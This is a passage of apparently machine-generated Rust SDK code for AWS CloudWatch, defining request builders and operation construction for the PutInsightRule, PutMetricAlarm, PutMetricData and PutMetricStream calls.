self.rule_state = input;
self
}
/// <p>The definition of the rule, as a JSON object. For details on the valid syntax, see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/ContributorInsights-RuleSyntax.html">Contributor Insights
/// Rule Syntax</a>.</p>
pub fn rule_definition(mut self, input: impl Into<std::string::String>) -> Self {
self.rule_definition = Some(input.into());
self
}
pub fn set_rule_definition(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.rule_definition = input;
self
}
pub fn tags(mut self, input: impl Into<crate::model::Tag>) -> Self {
let mut v = self.tags.unwrap_or_default();
v.push(input.into());
self.tags = Some(v);
self
}
pub fn set_tags(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Tag>>,
) -> Self {
self.tags = input;
self
}
/// Consumes the builder and constructs a [`PutInsightRuleInput`](crate::input::PutInsightRuleInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::PutInsightRuleInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::PutInsightRuleInput {
rule_name: self.rule_name,
rule_state: self.rule_state,
rule_definition: self.rule_definition,
tags: self.tags,
})
}
}
}
#[doc(hidden)]
pub type PutInsightRuleInputOperationOutputAlias = crate::operation::PutInsightRule;
#[doc(hidden)]
pub type PutInsightRuleInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl PutInsightRuleInput {
/// Consumes the builder and constructs an Operation<[`PutInsightRule`](crate::operation::PutInsightRule)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::PutInsightRule,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_put_insight_rule(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::PutInsightRule::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"PutInsightRule",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`PutInsightRuleInput`](crate::input::PutInsightRuleInput)
pub fn builder() -> crate::input::put_insight_rule_input::Builder {
crate::input::put_insight_rule_input::Builder::default()
}
}
/// See [`PutMetricAlarmInput`](crate::input::PutMetricAlarmInput)
pub mod put_metric_alarm_input {
/// A builder for [`PutMetricAlarmInput`](crate::input::PutMetricAlarmInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) alarm_name: std::option::Option<std::string::String>,
pub(crate) alarm_description: std::option::Option<std::string::String>,
pub(crate) actions_enabled: std::option::Option<bool>,
pub(crate) ok_actions: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) alarm_actions: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) insufficient_data_actions:
std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) metric_name: std::option::Option<std::string::String>,
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) statistic: std::option::Option<crate::model::Statistic>,
pub(crate) extended_statistic: std::option::Option<std::string::String>,
pub(crate) dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
pub(crate) period: std::option::Option<i32>,
pub(crate) unit: std::option::Option<crate::model::StandardUnit>,
pub(crate) evaluation_periods: std::option::Option<i32>,
pub(crate) datapoints_to_alarm: std::option::Option<i32>,
pub(crate) threshold: std::option::Option<f64>,
pub(crate) comparison_operator: std::option::Option<crate::model::ComparisonOperator>,
pub(crate) treat_missing_data: std::option::Option<std::string::String>,
pub(crate) evaluate_low_sample_count_percentile: std::option::Option<std::string::String>,
pub(crate) metrics: std::option::Option<std::vec::Vec<crate::model::MetricDataQuery>>,
pub(crate) tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
pub(crate) threshold_metric_id: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name for the alarm. This name must be unique within the Region.</p>
pub fn alarm_name(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_name = Some(input.into());
self
}
pub fn set_alarm_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.alarm_name = input;
self
}
/// <p>The description for the alarm.</p>
pub fn alarm_description(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_description = Some(input.into());
self
}
pub fn set_alarm_description(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.alarm_description = input;
self
}
/// <p>Indicates whether actions should be executed during any changes to the alarm state. The default is
/// <code>TRUE</code>.</p>
pub fn actions_enabled(mut self, input: bool) -> Self {
self.actions_enabled = Some(input);
self
}
pub fn set_actions_enabled(mut self, input: std::option::Option<bool>) -> Self {
self.actions_enabled = input;
self
}
pub fn ok_actions(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.ok_actions.unwrap_or_default();
v.push(input.into());
self.ok_actions = Some(v);
self
}
pub fn set_ok_actions(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.ok_actions = input;
self
}
pub fn alarm_actions(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.alarm_actions.unwrap_or_default();
v.push(input.into());
self.alarm_actions = Some(v);
self
}
pub fn set_alarm_actions(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.alarm_actions = input;
self
}
pub fn insufficient_data_actions(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.insufficient_data_actions.unwrap_or_default();
v.push(input.into());
self.insufficient_data_actions = Some(v);
self
}
pub fn set_insufficient_data_actions(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.insufficient_data_actions = input;
self
}
/// <p>The name for the metric associated with the alarm. For each <code>PutMetricAlarm</code>
/// operation, you must specify either <code>MetricName</code> or a <code>Metrics</code> array.</p>
/// <p>If you are creating an alarm based on a math expression, you cannot specify this parameter, or any of the
/// <code>Dimensions</code>, <code>Period</code>,
/// <code>Namespace</code>, <code>Statistic</code>, or <code>ExtendedStatistic</code> parameters. Instead, you specify
/// all this information in the <code>Metrics</code> array.</p>
pub fn metric_name(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_name = Some(input.into());
self
}
pub fn set_metric_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.metric_name = input;
self
}
/// <p>The namespace for the metric associated specified in <code>MetricName</code>.</p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
/// <p>The statistic for the metric specified in <code>MetricName</code>, other than percentile.
/// For percentile statistics, use <code>ExtendedStatistic</code>. When you call <code>PutMetricAlarm</code> and specify
/// a <code>MetricName</code>, you must
/// specify either <code>Statistic</code> or <code>ExtendedStatistic,</code> but not both.</p>
pub fn statistic(mut self, input: crate::model::Statistic) -> Self {
self.statistic = Some(input);
self
}
pub fn set_statistic(
mut self,
input: std::option::Option<crate::model::Statistic>,
) -> Self {
self.statistic = input;
self
}
/// <p>The percentile statistic for the metric specified in <code>MetricName</code>. Specify a value
/// between p0.0 and p100. When you call <code>PutMetricAlarm</code> and specify
/// a <code>MetricName</code>, you must
/// specify either <code>Statistic</code> or <code>ExtendedStatistic,</code> but not both.</p>
pub fn extended_statistic(mut self, input: impl Into<std::string::String>) -> Self {
self.extended_statistic = Some(input.into());
self
}
pub fn set_extended_statistic(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.extended_statistic = input;
self
}
pub fn dimensions(mut self, input: impl Into<crate::model::Dimension>) -> Self {
let mut v = self.dimensions.unwrap_or_default();
v.push(input.into());
self.dimensions = Some(v);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
) -> Self {
self.dimensions = input;
self
}
/// <p>The length, in seconds, used each time the metric specified in <code>MetricName</code> is
/// evaluated. Valid values are 10, 30, and any multiple of 60.</p>
/// <p>
/// <code>Period</code> is required for alarms based on static thresholds. If
/// you are creating an alarm based on a metric math expression, you specify the
/// period for each metric within the objects in the <code>Metrics</code> array.</p>
/// <p>Be sure to specify 10 or 30 only for metrics that are stored by a <code>PutMetricData</code> call with a
/// <code>StorageResolution</code> of 1. If you specify a period of 10 or 30 for a metric that does not have
/// sub-minute resolution, the alarm still attempts to gather data at the period rate that you specify. In this case,
/// it does not receive data for the attempts that do not correspond to a one-minute data resolution, and the alarm
/// might often lapse into INSUFFICENT_DATA status. Specifying 10 or 30 also sets this alarm as a high-resolution alarm,
/// which has a higher charge than other alarms. For more information about pricing, see <a href="https://aws.amazon.com/cloudwatch/pricing/">Amazon CloudWatch Pricing</a>.</p>
/// <p>An alarm's total current evaluation period can
/// be no longer than one day, so <code>Period</code> multiplied by <code>EvaluationPeriods</code> cannot be more than 86,400 seconds.</p>
pub fn period(mut self, input: i32) -> Self {
self.period = Some(input);
self
}
pub fn set_period(mut self, input: std::option::Option<i32>) -> Self {
self.period = input;
self
}
/// <p>The unit of measure for the statistic. For example, the units for the Amazon EC2
/// NetworkIn metric are Bytes because NetworkIn tracks the number of bytes that an instance
/// receives on all network interfaces. You can also specify a unit when you create a custom
/// metric. Units help provide conceptual meaning to your data. Metric data points that
/// specify a unit of measure, such as Percent, are aggregated separately.</p>
/// <p>If you don't specify <code>Unit</code>, CloudWatch retrieves all unit types that have been published for the
/// metric and attempts to evaluate the alarm.
/// Usually, metrics are
/// published with only one unit, so the alarm
/// works as intended.</p>
/// <p>However, if the metric is published with multiple types of units and you don't specify a unit, the alarm's
/// behavior is not defined and
/// it behaves predictably.</p>
/// <p>We recommend omitting <code>Unit</code> so that you don't inadvertently
/// specify an incorrect unit that is not published for this metric. Doing so
/// causes the alarm to be stuck in the <code>INSUFFICIENT DATA</code> state.</p>
pub fn unit(mut self, input: crate::model::StandardUnit) -> Self {
self.unit = Some(input);
self
}
pub fn set_unit(mut self, input: std::option::Option<crate::model::StandardUnit>) -> Self {
self.unit = input;
self
}
/// <p>The number of periods over which data is compared to the specified threshold. If you are
/// setting an alarm that requires that a number of consecutive data points be breaching to
/// trigger the alarm, this value specifies that number. If you are setting an "M out of N"
/// alarm, this value is the N.</p>
/// <p>An alarm's total current evaluation period can
/// be no longer than one day, so this number multiplied by <code>Period</code> cannot be more than 86,400 seconds.</p>
pub fn evaluation_periods(mut self, input: i32) -> Self {
self.evaluation_periods = Some(input);
self
}
pub fn set_evaluation_periods(mut self, input: std::option::Option<i32>) -> Self {
self.evaluation_periods = input;
self
}
/// <p>The number of data points that must be breaching to trigger the alarm. This is used only if you are setting
/// an "M out of N" alarm. In that case, this value is the M. For more information, see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html#alarm-evaluation">Evaluating an Alarm</a> in the
/// <i>Amazon CloudWatch User Guide</i>.</p>
pub fn datapoints_to_alarm(mut self, input: i32) -> Self {
self.datapoints_to_alarm = Some(input);
self
}
pub fn set_datapoints_to_alarm(mut self, input: std::option::Option<i32>) -> Self {
self.datapoints_to_alarm = input;
self
}
/// <p>The value against which the specified statistic is compared.</p>
/// <p>This parameter is required for alarms based on static thresholds, but should
/// not be used for alarms based on anomaly detection models.</p>
pub fn threshold(mut self, input: f64) -> Self {
self.threshold = Some(input);
self
}
pub fn set_threshold(mut self, input: std::option::Option<f64>) -> Self {
self.threshold = input;
self
}
/// <p> The arithmetic operation to use when comparing the specified statistic and
/// threshold. The specified statistic value is used as the first operand.</p>
/// <p>The values <code>LessThanLowerOrGreaterThanUpperThreshold</code>,
/// <code>LessThanLowerThreshold</code>, and <code>GreaterThanUpperThreshold</code>
/// are used only for alarms based on anomaly detection models.</p>
pub fn comparison_operator(mut self, input: crate::model::ComparisonOperator) -> Self {
self.comparison_operator = Some(input);
self
}
pub fn set_comparison_operator(
mut self,
input: std::option::Option<crate::model::ComparisonOperator>,
) -> Self {
self.comparison_operator = input;
self
}
/// <p> Sets how this alarm is to handle missing data points. If <code>TreatMissingData</code> is omitted, the default behavior of <code>missing</code> is used.
/// For more information, see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html#alarms-and-missing-data">Configuring How CloudWatch
/// Alarms Treats Missing Data</a>.</p>
/// <p>Valid Values: <code>breaching | notBreaching | ignore | missing</code>
/// </p>
pub fn treat_missing_data(mut self, input: impl Into<std::string::String>) -> Self {
self.treat_missing_data = Some(input.into());
self
}
pub fn set_treat_missing_data(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.treat_missing_data = input;
self
}
/// <p> Used only for alarms based on percentiles. If you specify <code>ignore</code>, the alarm state does not change during periods with too few data points to be
/// statistically significant. If you specify <code>evaluate</code> or omit this parameter, the alarm is always evaluated and possibly changes state
/// no matter how many data points are available. For more information, see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html#percentiles-with-low-samples">Percentile-Based CloudWatch Alarms and Low Data Samples</a>.</p>
/// <p>Valid Values: <code>evaluate | ignore</code>
/// </p>
pub fn evaluate_low_sample_count_percentile(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.evaluate_low_sample_count_percentile = Some(input.into());
self
}
pub fn set_evaluate_low_sample_count_percentile(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.evaluate_low_sample_count_percentile = input;
self
}
pub fn metrics(mut self, input: impl Into<crate::model::MetricDataQuery>) -> Self {
let mut v = self.metrics.unwrap_or_default();
v.push(input.into());
self.metrics = Some(v);
self
}
pub fn set_metrics(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::MetricDataQuery>>,
) -> Self {
self.metrics = input;
self
}
pub fn tags(mut self, input: impl Into<crate::model::Tag>) -> Self {
let mut v = self.tags.unwrap_or_default();
v.push(input.into());
self.tags = Some(v);
self
}
pub fn set_tags(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Tag>>,
) -> Self {
self.tags = input;
self
}
/// <p>If this is an alarm based on an anomaly detection model, make this value match
/// the ID of
/// the <code>ANOMALY_DETECTION_BAND</code> function.</p>
/// <p>For an example of how to use this parameter, see the
/// <b>Anomaly Detection
/// Model Alarm</b> example on this page.</p>
/// <p>If your alarm uses this parameter, it cannot have Auto Scaling actions.</p>
pub fn threshold_metric_id(mut self, input: impl Into<std::string::String>) -> Self {
self.threshold_metric_id = Some(input.into());
self
}
pub fn set_threshold_metric_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.threshold_metric_id = input;
self
}
/// Consumes the builder and constructs a [`PutMetricAlarmInput`](crate::input::PutMetricAlarmInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::PutMetricAlarmInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::PutMetricAlarmInput {
alarm_name: self.alarm_name,
alarm_description: self.alarm_description,
actions_enabled: self.actions_enabled,
ok_actions: self.ok_actions,
alarm_actions: self.alarm_actions,
insufficient_data_actions: self.insufficient_data_actions,
metric_name: self.metric_name,
namespace: self.namespace,
statistic: self.statistic,
extended_statistic: self.extended_statistic,
dimensions: self.dimensions,
period: self.period,
unit: self.unit,
evaluation_periods: self.evaluation_periods,
datapoints_to_alarm: self.datapoints_to_alarm,
threshold: self.threshold,
comparison_operator: self.comparison_operator,
treat_missing_data: self.treat_missing_data,
evaluate_low_sample_count_percentile: self.evaluate_low_sample_count_percentile,
metrics: self.metrics,
tags: self.tags,
threshold_metric_id: self.threshold_metric_id,
})
}
}
}
#[doc(hidden)]
pub type PutMetricAlarmInputOperationOutputAlias = crate::operation::PutMetricAlarm;
#[doc(hidden)]
pub type PutMetricAlarmInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl PutMetricAlarmInput {
/// Consumes the builder and constructs an Operation<[`PutMetricAlarm`](crate::operation::PutMetricAlarm)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::PutMetricAlarm,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_put_metric_alarm(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::PutMetricAlarm::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"PutMetricAlarm",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`PutMetricAlarmInput`](crate::input::PutMetricAlarmInput)
pub fn builder() -> crate::input::put_metric_alarm_input::Builder {
crate::input::put_metric_alarm_input::Builder::default()
}
}
/// See [`PutMetricDataInput`](crate::input::PutMetricDataInput)
pub mod put_metric_data_input {
/// A builder for [`PutMetricDataInput`](crate::input::PutMetricDataInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) metric_data: std::option::Option<std::vec::Vec<crate::model::MetricDatum>>,
}
impl Builder {
/// <p>The namespace for the metric data.</p>
/// <p>To avoid conflicts
/// with AWS service namespaces, you should not specify a namespace that begins with <code>AWS/</code>
/// </p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
pub fn metric_data(mut self, input: impl Into<crate::model::MetricDatum>) -> Self {
let mut v = self.metric_data.unwrap_or_default();
v.push(input.into());
self.metric_data = Some(v);
self
}
pub fn set_metric_data(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::MetricDatum>>,
) -> Self {
self.metric_data = input;
self
}
/// Consumes the builder and constructs a [`PutMetricDataInput`](crate::input::PutMetricDataInput)
pub fn build(
self,
) -> std::result::Result<crate::input::PutMetricDataInput, smithy_http::operation::BuildError>
{
Ok(crate::input::PutMetricDataInput {
namespace: self.namespace,
metric_data: self.metric_data,
})
}
}
}
#[doc(hidden)]
pub type PutMetricDataInputOperationOutputAlias = crate::operation::PutMetricData;
#[doc(hidden)]
pub type PutMetricDataInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl PutMetricDataInput {
/// Consumes the builder and constructs an Operation<[`PutMetricData`](crate::operation::PutMetricData)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::PutMetricData,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_put_metric_data(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::PutMetricData::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"PutMetricData",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`PutMetricDataInput`](crate::input::PutMetricDataInput)
pub fn builder() -> crate::input::put_metric_data_input::Builder {
crate::input::put_metric_data_input::Builder::default()
}
}
/// See [`PutMetricStreamInput`](crate::input::PutMetricStreamInput)
pub mod put_metric_stream_input {
/// A builder for [`PutMetricStreamInput`](crate::input::PutMetricStreamInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) name: std::option::Option<std::string::String>,
pub(crate) include_filters:
std::option::Option<std::vec::Vec<crate::model::MetricStreamFilter>>,
pub(crate) exclude_filters:
std::option::Option<std::vec::Vec<crate::model::MetricStreamFilter>>,
pub(crate) firehose_arn: std::option::Option<std::string::String>,
pub(crate) role_arn: std::option::Option<std::string::String>,
pub(crate) output_format: std::option::Option<crate::model::MetricStreamOutputFormat>,
pub(crate) tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl Builder {
/// <p>If you are creating a new metric stream, this is the name for the new stream. The name
/// must be different than the names of other metric streams in this account and Region.</p>
/// <p>If you are updating a metric stream, specify the name of that stream here.</p>
/// <p>Valid characters are A-Z, a-z, 0-9, "-" and "_".</p>
pub fn name(mut self, input: impl Into<std::string::String>) -> Self {
self.name = Some(input.into());
self
}
pub fn set_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.name = input;
self
}
pub fn include_filters(
mut self,
input: impl Into<crate::model::MetricStreamFilter>,
) -> Self {
let mut v = self.include_filters.unwrap_or_default();
v.push(input.into());
self.include_filters = Some(v);
self
}
pub fn set_include_filters(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::MetricStreamFilter>>,
) -> Self {
self.include_filters = input;
self
}
pub fn exclude_filters(
mut self,
input: impl Into<crate::model::MetricStreamFilter>,
) -> Self {
let mut v = self.exclude_filters.unwrap_or_default();
v.push(input.into());
self.exclude_filters = Some(v);
self
}
pub fn set_exclude_filters(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::MetricStreamFilter>>,
) -> Self {
self.exclude_filters = input;
self
}
/// <p>The ARN of the Amazon Kinesis Firehose delivery stream to use for this metric stream.
/// This Amazon Kinesis Firehose delivery stream must already exist and must be in the same
/// account as the metric stream.</p>
pub fn firehose_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.firehose_arn = Some(input.into());
self
}
pub fn set_firehose_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.firehose_arn = input;
self
}
/// <p>The ARN of an IAM role that this metric stream will use to access
/// Amazon Kinesis Firehose resources. This IAM role must already
/// exist and must be in the same account as the metric stream. This IAM role must include the following permissions:</p>
/// <ul>
/// <li>
/// <p>firehose:PutRecord</p>
/// </li>
/// <li>
/// <p>firehose:PutRecordBatch</p>
/// </li>
/// </ul>
pub fn role_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.role_arn = Some(input.into());
self
}
pub fn set_role_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.role_arn = input;
self
}
/// <p>The output format for the stream. Valid values are <code>json</code>
/// and <code>opentelemetry0.7</code>. For more information about metric stream
/// output formats, see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch-metric-streams-formats.html">
/// Metric streams output formats</a>.</p>
pub fn output_format(mut self, input: crate::model::MetricStreamOutputFormat) -> Self {
self.output_format = Some(input);
self
}
pub fn set_output_format(
mut self,
input: std::option::Option<crate::model::MetricStreamOutputFormat>,
) -> Self {
self.output_format = input;
self
}
pub fn tags(mut self, input: impl Into<crate::model::Tag>) -> Self {
let mut v = self.tags.unwrap_or_default();
v.push(input.into());
self.tags = Some(v);
self
}
pub fn set_tags(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Tag>>,
) -> Self {
self.tags = input;
self
}
/// Consumes the builder and constructs a [`PutMetricStreamInput`](crate::input::PutMetricStreamInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::PutMetricStreamInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::PutMetricStreamInput {
name: self.name,
include_filters: self.include_filters,
exclude_filters: self.exclude_filters,
firehose_arn: self.firehose_arn,
role_arn: self.role_arn,
output_format: self.output_format,
tags: self.tags,
})
}
}
}
#[doc(hidden)]
pub type PutMetricStreamInputOperationOutputAlias = crate::operation::PutMetricStream;
#[doc(hidden)]
pub type PutMetricStreamInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl PutMetricStreamInput {
/// Consumes the builder and constructs an Operation<[`PutMetricStream`](crate::operation::PutMetricStream)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::PutMetricStream,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_put_metric_stream(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
